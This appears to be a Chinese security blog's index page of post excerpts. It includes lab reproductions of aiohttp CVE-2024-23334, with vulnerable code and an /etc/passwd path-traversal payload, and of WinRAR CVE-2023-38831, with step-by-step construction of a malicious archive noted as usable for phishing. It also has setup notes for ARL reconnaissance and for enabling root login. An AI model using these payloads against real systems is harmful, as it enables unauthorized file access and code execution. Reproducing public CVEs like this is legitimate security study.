/images/avatar.png

ev1l0o4g's blog

Aiohttp目录穿越(CVE-2024-23334)复现

漏洞详情 aiohttp是一个用于asyncio和Python的异步HTTP客户端/服务器框架。当使用aiohttp作为web服务器并配置静态路由时,有必要指定静态文件的根路径。此外,选项follow_symlinks可用于确定是否遵循静态根目录之外的符号链接。当follow_symlinks设置为True时,不需要验证读取文件是否在根目录中。这可能导致目录遍历漏洞,导致未经授权访问系统上的任意文件,即使不存在符号链接。 环境搭建与复现 Linux新建static目录和test.py文件,存在漏洞的代码: 1 2 3 4 5 6 7 8 9 10 11 12 13 from aiohttp import web async def index(request): return web.Response(text="Hello, World!") app = web.Application() app.router.add_routes([ web.static("/static", "static/", follow_symlinks=True), ]) app.router.add_get('/', index) if __name__ == '__main__': web.run_app(app) 安装aiohttp3.9.1:pip3 install aiohttp==3.9.1 payload:/static/../../../../../etc/passwd,需要针对../进行模糊测试 nuclei-template: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 id: aiohttp-lfi info: name: aiohttp-lfi author: dukodvco severity: medium description: CVE-2024-33334 reference: - https://github.

UBlockOrigin屏蔽github弱智

uBlock Origin插件在自定义静态规则添加如下规则: 1 2 3 4 5 6 7 8 9 github.com##.Box-sc-g0xbh4-0.hKtuLA:has-text(cirosantilli) github.com##.Box-sc-g0xbh4-0.hKtuLA:has-text(cheezcharmer) github.com##.Box-sc-g0xbh4-0.hKtuLA:has-text(zaohmeing) github.com##.Box-sc-g0xbh4-0.hKtuLA:has-text(zhaohmng-outlook-com) github.com##.Box-sc-g0xbh4-0.hKtuLA:has-text(codin-stuffs) github.com##.Box-sc-g0xbh4-0.hKtuLA:has-text(Dimples1337) github.com##.Box-sc-g0xbh4-0.hKtuLA:has-text(pxvr-official) github.com##.Box-sc-g0xbh4-0.hKtuLA:has-text(zpc1314521) github.com##.Box-sc-g0xbh4-0.hKtuLA:has-text(b0LBwZ7r5HOeh6CBMuQIhVu3-s-random-fork)

记灯塔ARL的搭建

灯塔找资产还是挺好用的! docker安装ARL 1 2 3 4 5 6 7 8 cd /opt/ mkdir docker_arl wget -O docker_arl/docker.zip https://github.com/TophantTechnology/ARL/releases/download/v2.6/docker.zip cd docker_arl unzip -o docker.zip docker-compose pull docker volume create arl_db docker-compose up -d 如果pull失败,要么用代理,要么换docker镜像源。记得docker启动前修改配置文件,添加fofa/hunter/quake密钥。 批量导入POC 在docker_arl目录创建poc文件夹,将POC文件放在/docker_arl/poc路径,docker重启ARL即可。 批量导入指纹 要想批量导入指纹,可以使用使用ARL-Finger-ADD ARL-Finger-ADD批量导入的是Ehole3.0的指纹,嫌指纹少可以用各大佬的魔改版Ehole指纹。

记win11终端ssh配置和Ubuntu设置root登录

win11终端配置 win11自带SSH,如果在把服务器添加到win11终端岂不是方便了许多。 操作很简单,在终端新建配置文件,命令行改为ssh的命令,给配置文件起个名,保存就完事 甚至还能设置自己心爱的logo,缺点就是每次要输密码,不过也可以密钥免密登录 Ubuntu设置root登录 上次出差因为酒店房间线路短路,导致前任电脑出现了硬伤,无奈只好含(喜)泪重(提)金购置小“外星人”。 重装ubuntu虚拟机就很烦,桌面版ubuntu默认禁止root登录,想要以root用户进行登录需要进行一些操作,如下: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 一、 修改文件/usr/share/lightdm/lightdm.conf.d/50-unity-greeter.conf文件,增加两行: greeter-show-manual-login=true all-guest=false 保存 二、 进入/etc/pam.d目录,修改gdm-autologin和gdm-password文件 vi gdm-autologin 注释掉auth required pam_succeed_if.so user != root quiet_success这一行,保存 vi gdm-password 注释掉 auth required pam_succeed_if.so user != root quiet_success这一行,保存 三、 修改/root/.profile文件 vi /root/.profile 将文件末尾的mesg n || true这一行修改成tty -s&&mesg n || true, 保存 四、 重启系统,输入root用户名和密码,登录系统。 五、 vim /etc/gdm3/custom.

记一些环境错误的修复

kali添加环境变量 golang安装工具后无法执行,需添加环境变量 1 2 3 4 vim /etc/profile export PATH=/root/go/bin:$PATH source /etc/profile 但重启终端后依然无效,还需在/root/.zshrc添加 1 2 3 4 vim /root/.zshrc export PATH=/root/go/bin:$PATH source /root/.zshrc ubuntu解决libc.so.6报错 ubuntu经常遇到libc.so.6报错: /XXXXX: /lib/x86_64-linux-gnu/libc.so.6: version 'GLIBC_2.32' not found (required by./XXXXX) 试了众多方法,终于找到一个有效的: 1 2 3 4 5 6 7 8 9 编辑更新源: vim /etc/apt/sources.list 添加 deb [http://th.archive.ubuntu.com/ubuntu](http://th.archive.ubuntu.com/ubuntu) jammy main 执行 apt-get update apt-get install libc6 ubuntu系统上systemd-resolved不使用127.0.0.53的方法 自建DNSlog总遇到53端口被占用,试了百度的几个方法也是治标不治本,甚至会影响服务器更新,试了下面的方法比较有效,也不影响服务器更新。 方法源于:https://dyrnq.com/ubuntu-update-etc-resolve-conf/ 有些文章说用关闭(删除)systemd-resolved ,而使用 resolvconf 、openresolv、Unbound 替换,测试发现在ubuntu 20.04.2 LTS NetworkManager已经被 systemd-networkd 取代,复杂度(依赖关系)较高。所以研究依然保持使用systemd-resolved而不使用127.0.0.53的配置思路。

WinRAR代码执行漏洞CVE 2023 38831复现

复现环境 Windows11(貌似自带7-zip) WinRAR 6.20 漏洞详情 WinRAR 在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码。 影响版本 WinRAR < 6.23 漏洞复现 创建CVE-2023-38831文件夹,在该文件夹创建test文件夹,test文件夹内创建38831.txt文件,内容随意。 回到CVE-2023-38831文件夹,创建新的文件夹,命名为38831.txt。 接着在38831.txt文件夹创建名为38831.txt .cmd文件,注意有空格,内容为弹calc。 使用WinRAR将38831.txt文件夹重命名压缩 并追加test文件夹内的38831.txt文件 使用WinRAR打开压缩后的exploit_38831.zip文件,在38831.txt后追加一个空格 双击38831.txt文件即可执行命令 该漏洞可用于钓鱼,若受害者使用的WinRAR版本低于6.23,打开了攻击者构造的恶意文件即可达到攻击者目的。 漏洞修复 升级WinRAR至6.23及以上。 https://www.rarlab.com/